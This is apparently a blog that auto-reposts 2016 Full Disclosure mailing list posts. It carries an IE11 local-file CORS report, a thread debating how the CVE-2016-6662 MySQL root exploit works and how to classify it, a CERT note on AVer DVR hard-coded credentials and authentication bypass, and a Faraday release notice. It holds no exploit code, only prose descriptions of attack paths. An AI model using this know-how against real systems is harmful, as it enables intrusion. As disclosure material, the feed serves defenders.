IE11 is not following CORS specification for local files like Chrome and Firefox. I've contacted Microsoft and they say this is not a security issue so I'm sharing it. From my tests IE11 is not following CORS specifications for local files as supposed to be. In order to prove I've created a malicious html file with the content below. The file above will be able to get an skype token and perform get on the user profile. Instead of using alert() function I could send this information to a domain that I have control. Of course the victim needs to open the file from his local drive or maybe another application can open an IE instance. If the user is logged on a Microsoft account and open the html file with the content above with onload function instead of onclick I'd be able to get his profile data. This is a simple scenario. An attacker would be able to get any data from any domain that do not require a unique ID (e.g. CSRF token) which the attacker doesn't have and is unable to get. If you do the same test on Chrome or Firefox the browser will follow CORS specification and block the response content since no CORS headers is present in the response. I tested on IE11 running on Win7SP1 with all security patches and it worked. On Win10 didn't work. I didn't test in any server with CORS enabled. If you think in another malicious scenario please let me know. Thanks! Ricardo Iramar

Source: Gmail -> IFTTT-> Blogger

Re: [FD] CVE-2016-6662 - MySQL Remote Root Code Execution / Privilege Escalation ( 0day )

Thanks for your explanation. It is a very good discovery to be sure. Yet I still think that a 'remote root' is something different - Google gives me this for example: http://ift.tt/2dhTcwq which is a way to directly become root from the internet through a vulnerable piece of server software listening on a socket. Connect, exploit, root. In your case, another hurdle has to be cleared first - either SQL injection (which is another vulnerability), or a valid database account. So, yes, it can be exploited remotely, and yes, you can become root, but only if you have a db account or another vulnerability in front of this one. None of this is to say that your discovery is not very cool. You are rightly proud of it. Mark On 23-09-16 05:58, Dawid Golunski wrote: > Hi Mark, > > Thanks for the feedback. > I'll answer your questions and throw in a few other comments on here > using the occasion that will > hopefully clarify some of the other misconceptions I've seen around or > be otherwise useful to someone. > > As for SUPER priv requirement. > The short answer is: yes, you are wrong in thinking that (but good > that you question it at least :) > > SUPER privilege is not required as mentioned in my advisory in the > dedicated chapter V. 3) titled: > '3) Attackers with only SELECT/FILE permissions can gain access to > logging functions[...]' > You could confirm this by running the exploit, or having a look at the > example run output or the replication steps that show the exact > privileges applied on the test account (no SUPER privs in there :) > The current PoC exploit basically abuses the power of a risky FILE > privilege alone which can be used to escalate > privileges via a number of ways (including extracting mysql password > hashes, or injecting specially crafted triggers as shown in the > advisory/PoC exploit). > > As for your remote exploitation and user/password requirement question. > Although the current PoC is limited (to give users a chance to react > to this vuln etc.), notice that the advisory mentions that SQL > Injection could be used as a vector for exploitation in addition to an > authenticated connection to the mysql service (via direct connection > to mysql port, or via phpMyAdmin). > SQL injection attacks can be conducted remotely so I'd say it is fair > to call it a remote exploit. > I'd say it'd still be a remote exploit even with a remote > authenticated connection to mysql service was the only option (i.e. > Authenticated RCE is still an RCE if that makes sense). > On a separate note, I'm not aware of other _reliable/working_ recent > MySQL PoC exploits that could let remote attackers (even starting with > database admin/super privs) to bypass protections such as SELinux and > AppArmor and achieve remote code execution, let alone gain root access > on top of that through MySQL exploitation. > Other than the old vuln from 2003 > (http://ift.tt/2d7fYqv) that is similar to my exploit > and which I referenced in my advisory. > Note that CERT also mentioned remote exploitation in the description > of the article and gave it a CVSS score of 9.43. > > As for other reliable exploits that could get you a shell through MySQL. > Some years ago (<2008) it used to be possible for malicious _database > admin_ users (required access to CREATE FUNCTION statement) to create > a malicious UDF (user-defined function) from a library that executed a > system() call and let an attacker run commands as myql system user. > The UDF "trick" was blocked however in 2008 , in MySQ version 5.0.67. > >From then on MySQL only allows loading UDF libraries from trusted > system directories (writable by root only). And _even_ if you had a > way to inject a library into a trusted directory and create a > malicious UDF function from it, you'd still be blocked by default > policies of SELinux or AppArmor on many modern systems when trying to > execute system() call or similar as the mysqld process. > There are some blog posts around still showing the UDF method as a way > to get code execution on today's MySQL setups. They however rely on > the mysqld process running as root which never happens in practice > (note that my exploit targets mysqld_safe which does in contrast run > as root on many default setups) and if it did , you'd have bigger > problems to start with :) > That's just to illustrate some of the challenges. If anyone knows of a > working/reliable exploit that can address these and achieve remote > code execution through MySQL then I'd be interested to learn the > details :) > > > Another misconception I've seen on some forums that is that the > CVE-2016-6662 vulnerability I discovered is not exploitable on systems > without overly-permissive my.cnf config files (e.g owned by mysql). > This is not correct and I addressed this in the advisory in section: > > "'2) Create new configuration files within a MySQL data directory > (writable by MySQL by default) on _default_ MySQL installs without the > need to rely on improper config permissions" > > which mentions that attackers could in fact be able to inject new > valid configs on systems with default my.cnf/datadir permissions (not > implemented in the current limited PoC). This is actually the reason > behind creating a dummy my.cnf in /var/lib/mysql datadir with root > perms as a temporary mitigation (i.e. to prevent malicious attackers > from creating a new my.cnf file in datadir on default setups when > they're unable to find one with weak perms). > > > I should have probably extended some of the descriptions in my > advisory from the start to make it easier to understand for a larger > group of people, but still I put a lot of effort into making the > advisory quite detailed (including comments in the exploit code etc.) > with most answers in it for those who read it closely/tested the > provided PoC, especially taking into account the crazy > circumstances/timing when it all happened... > I wrote the advisory/exploits over 3 sleepless nights on my holiday > when backpacking through the north of Brazil, stuck at a hostel's > lounge with mosquitoes and other drunk travelers running around > through the night (think of having the 'team distraction' from DefCon > https://youtu.be/rVwaIe6CiHw?t=3548 over a few sleepless nights :) > But that's another story, probably for a blog post or a chat with some > fernet/vodka at the upcoming EkoParty conference in Buenos Aires ;) > > Sorry for a lengthy message. > Hopefully this will answer not only your doubts but also help to clear > up similar misconceptions out there. > I updated my advisory with a few extra clarifications/notes at: > > http://ift.tt/2cpoG2D > > I should follow up shortly with more info shared via my website: > http://legalhackers.com > > or my twitter feed: > https://twitter.com/dawid_golunski > > > Thanks for reading all of that (if you got here that is :) > >

Source: Gmail -> IFTTT-> Blogger

Re: [FD] CVE-2016-6662 - MySQL Remote Root Code Execution / Privilege Escalation ( 0day )

I think the term is 'remote privilege escalation' (as opposed to local privilege escalation). As a headline I'd suggest 'remote privilege escalation from any mysql user to root'. Mark On 23-09-16 19:20, Dawid Golunski wrote: > Hi Mark, > > Thanks for that. I guess it depends which RCE definition you follow. > For example if you take: > > 'The ability to trigger arbitrary code execution from one machine on > another (especially via a wide-area network such as the Internet) is > often referred to as remote code execution.' > from: http://ift.tt/1mkbPsp > > Then you could have a remote exploit that _does_ require an > authentication before triggering code execution on the remote > target/machine and still call it a remote exploit. I.e. Pre-Auth > Remote Execution VS Authenticated Remote Execution. > You'll find many remote exploits with those prefixes, including on the > cisco website you quoted, for example: > http://ift.tt/1O6abzy > > I agree however that my exploit strays a bit from a typical RCE > (leaving preauth/authed classification aside) "concept" as the code > execution is not instantaneous. I.e. it involves a delay due to a > service restart (necessary in order to hook to the service startup and > gain the root privileges before they're dropped ,since the mysqld > daemon itself never serves requests as root). > I've chosen 'Remote Root Code Execution / Privilege Escalation' name > to keep it simple and to reflect/focus on the same end result/impact > that a typical Root RCE would have - i.e. gaining a remote attacker a > rootshell. > If I called it a "Local exploit" then many people out there could > think that they can't be attacked from another host and local shell is > required. Whereas "Remote SQL injection/authed remote connection to > Root Command Execution with a delay" sounds kind of long ;) > > One more note/clarification I might as well throw in here. > Obviously it doesn't meant that the attacker has to wait endlessly for > the exploit to finish its job. Once the exploitation is done and > config has been poisoned with the malicious library injected they can > go away and the reverse root shell will say hi whenever a restart > takes place ;) > Additionally, I've also found that remote attackers could be able to > speed up the restart by remotely executing the SHUTDOWN > command/statement which could bring the exploit closer to a typical > RCE concept. I've added this note to my advisory now too. > > Hope this clears up the naming a bit and the reasoning behind it. > Of course, I'm not trying to insist on the naming I used as > you/everyone else will have their own preference for classification of > a remote exploit or their own ideas for an alternative name. There are > also more constructive things to be doing rather than insisting on a > particular name (e.g publishing remaining vulns :) > The important bit is to keep in mind the impact of the vuln (root > shell) and that it may also get exploited by remote (authed/sql > injection) attackers. > > Thanks again. >

Source: Gmail -> IFTTT-> Blogger

[FD] [Adobe Flash] local-with-filesystem sandbox bypass via navigateToURL() and UI redressing

[FD] skype installer dll hijacking vulnerability - CVE-2016-5720

Hi, There are a dll planting vuln in skype installer. This vuln had been reported to Microsoft but they decided not fix this. Here is the vulnerability details:

Source: Gmail -> IFTTT-> Blogger

Re: [FD] XSS Wordpress W3 Total Cache <= 0.9.4.1

[FD] Welcome Faraday 2.1! Collaborative Penetration Test & Vulnerability Management Platform

After a long sprint we are proud to present Faraday v2.1: Faraday is the Integrated Multiuser Risk Environment you were looking for! It maps and leverages all the knowledge you generate in real time, letting you track and understand your audits. Our dashboard for CISOs and managers uncovers the impact and risk being assessed by the audit in real-time without the need for a single email. Developed with a specialized set of functionalities that help users improve their own work, the main purpose is to re-use the available tools in the community taking advantage of them in a collaborative way! Check out the Faraday project in Github. http://ift.tt/1D8gKXz This sprint was mostly spent refactoring the Faraday Client, and it really payed off! Now it supports massive workspaces with over 200k hosts. We also want to announce the launch of Faraday's brand new forum! There you can discuss any and all things related to Faraday. Bug reports, suggestions, and feedback are welcome! http://ift.tt/2cWL046 Changes: - New plugin: WPscan https://wpscan.org/ - Major refactor of Faraday Client: now we support massive workspaces (200.000+ hosts) - Dashboard is now refreshed automatically every 60 seconds - Host Sidebar on GTK now adds information more intelligently and will never block the application - Evidence screenshots in report generation are now bigger - Added a help menu to the GTK UI - Added a help section to the WEB UI - Bugfixing propecia plugin - 10+ minor bugs on the Web UI - Searches containing space character on Web UI - Updated URL shown when starting Faraday The next events where you can find us: (London) http://ift.tt/2dn1sZx (Buenos Aires) http://ift.tt/1NEda1l (Tokio) http://ift.tt/2dn1tg3 We hope you enjoy it, and let us know if you have any questions or comments. http://ift.tt/1D4inIk http://ift.tt/1D8gKXz https://twitter.com/faradaysec http://ift.tt/2cWL046

Source: Gmail -> IFTTT-> Blogger

[FD] Vulnerability Note VU#667480 - AVer EH6108H+ hybrid DVR contains multiple vulnerabilities

Vulnerability Note VU#667480 AVer Information EH6108H+ hybrid DVR contains multiple vulnerabilities http://ift.tt/2dhPeUt Overview: AVer Information EH6108H+ hybrid DVR, version X9.03.24.00.07l and possibly earlier, reportedly contains multiple vulnerabilities, including undocumented privileged accounts, authentication bypass, and information exposure. Description: AVer Information EH6108H+ hybrid DVR is an IP security camera management system and streaming video recorder. Version X9.03.24.00.07l and possibly earlier are reported to contain multiple vulnerabilities. CWE-798: Use of Hard-coded Credentials - CVE-2016-6535 AVer Information EH6108H+ reportedly contains two undocumented, hard-coded account credentials. Both accounts have root privileges and may be used to gain access via an undocumented telnet service that cannot be disabled through the web user interface and runs by default. CWE-302: Authentication Bypass by Assumed-Immutable Data - CVE-2016-6536 By guessing the handle parameter of the /setup page of the web interface, an unauthenticated attacker reportedly may be able to access restricted pages and alter DVR configurations or change user passwords. CWE-200: Information Exposure - CVE-2016-6537 User credentials are reported to be stored and transmitted in an insecure manner. In the configuration page of the web interface, passwords are stored in base64-encoded strings. In client requests, credentials are listed in plain text in the cookie header. For more information, refer to the researcher's disclosure. (http://ift.tt/2dAvY54 and-more) Impact: A remote, unauthenticated attacker may be able to gain access with root privileges to completely compromise vulnerable devices. Solution: The CERT/CC is currently unaware of a practical solution to this problem and recommends the following workaround. Restrict access As a general good security practice, only allow connections from trusted hosts and networks. References: http://ift.tt/2cVfBNp http://ift.tt/2dAwmAD nd-more http://ift.tt/1cWWrCj http://ift.tt/2cVeD3L http://ift.tt/1eDYFur

Source: Gmail -> IFTTT-> Blogger

Re: [FD] CVE-2016-6662 - MySQL Remote Root Code Execution / Privilege Escalation ( 0day )

Hi Mark, Thanks for the feedback. I'll answer your questions and throw in a few other comments on here using the occasion that will hopefully clarify some of the other misconceptions I've seen around or be otherwise useful to someone. As for SUPER priv requirement. The short answer is: yes, you are wrong in thinking that (but good that you question it at least :) SUPER privilege is not required as mentioned in my advisory in the dedicated chapter V. 3) titled: '3) Attackers with only SELECT/FILE permissions can gain access to logging functions[...]' You could confirm this by running the exploit, or having a look at the example run output or the replication steps that show the exact privileges applied on the test account (no SUPER privs in there :) The current PoC exploit basically abuses the power of a risky FILE privilege alone which can be used to escalate privileges via a number of ways (including extracting mysql password hashes, or injecting specially crafted triggers as shown in the advisory/PoC exploit). As for your remote exploitation and user/password requirement question. Although the current PoC is limited (to give users a chance to react to this vuln etc.), notice that the advisory mentions that SQL Injection could be used as a vector for exploitation in addition to an authenticated connection to the mysql service (via direct connection to mysql port, or via phpMyAdmin). SQL injection attacks can be conducted remotely so I'd say it is fair to call it a remote exploit. I'd say it'd still be a remote exploit even with a remote authenticated connection to mysql service was the only option (i.e. Authenticated RCE is still an RCE if that makes sense). On a separate note, I'm not aware of other _reliable/working_ recent MySQL PoC exploits that could let remote attackers (even starting with database admin/super privs) to bypass protections such as SELinux and AppArmor and achieve remote code execution, let alone gain root access on top of that through MySQL exploitation. Other than the old vuln from 2003 (http://ift.tt/2d7fYqv) that is similar to my exploit and which I referenced in my advisory. Note that CERT also mentioned remote exploitation in the description of the article and gave it a CVSS score of 9.43. As for other reliable exploits that could get you a shell through MySQL. Some years ago (<2008) it used to be possible for malicious _database admin_ users (required access to CREATE FUNCTION statement) to create a malicious UDF (user-defined function) from a library that executed a system() call and let an attacker run commands as myql system user. The UDF "trick" was blocked however in 2008 , in MySQ version 5.0.67. From then on MySQL only allows loading UDF libraries from trusted system directories (writable by root only). And _even_ if you had a way to inject a library into a trusted directory and create a malicious UDF function from it, you'd still be blocked by default policies of SELinux or AppArmor on many modern systems when trying to execute system() call or similar as the mysqld process. There are some blog posts around still showing the UDF method as a way to get code execution on today's MySQL setups. They however rely on the mysqld process running as root which never happens in practice (note that my exploit targets mysqld_safe which does in contrast run as root on many default setups) and if it did , you'd have bigger problems to start with :) That's just to illustrate some of the challenges. If anyone knows of a working/reliable exploit that can address these and achieve remote code execution through MySQL then I'd be interested to learn the details :) Another misconception I've seen on some forums that is that the CVE-2016-6662 vulnerability I discovered is not exploitable on systems without overly-permissive my.cnf config files (e.g owned by mysql). This is not correct and I addressed this in the advisory in section: "'2) Create new configuration files within a MySQL data directory (writable by MySQL by default) on _default_ MySQL installs without the need to rely on improper config permissions" which mentions that attackers could in fact be able to inject new valid configs on systems with default my.cnf/datadir permissions (not implemented in the current limited PoC). This is actually the reason behind creating a dummy my.cnf in /var/lib/mysql datadir with root perms as a temporary mitigation (i.e. to prevent malicious attackers from creating a new my.cnf file in datadir on default setups when they're unable to find one with weak perms). I should have probably extended some of the descriptions in my advisory from the start to make it easier to understand for a larger group of people, but still I put a lot of effort into making the advisory quite detailed (including comments in the exploit code etc.) with most answers in it for those who read it closely/tested the provided PoC, especially taking into account the crazy circumstances/timing when it all happened... I wrote the advisory/exploits over 3 sleepless nights on my holiday when backpacking through the north of Brazil, stuck at a hostel's lounge with mosquitoes and other drunk travelers running around through the night (think of having the 'team distraction' from DefCon https://youtu.be/rVwaIe6CiHw?t=3548 over a few sleepless nights :) But that's another story, probably for a blog post or a chat with some fernet/vodka at the upcoming EkoParty conference in Buenos Aires ;) Sorry for a lengthy message. Hopefully this will answer not only your doubts but also help to clear up similar misconceptions out there. I updated my advisory with a few extra clarifications/notes at: http://ift.tt/2cpoG2D I should follow up shortly with more info shared via my website: http://legalhackers.com or my twitter feed: https://twitter.com/dawid_golunski Thanks for reading all of that (if you got here that is :)

Source: Gmail -> IFTTT-> Blogger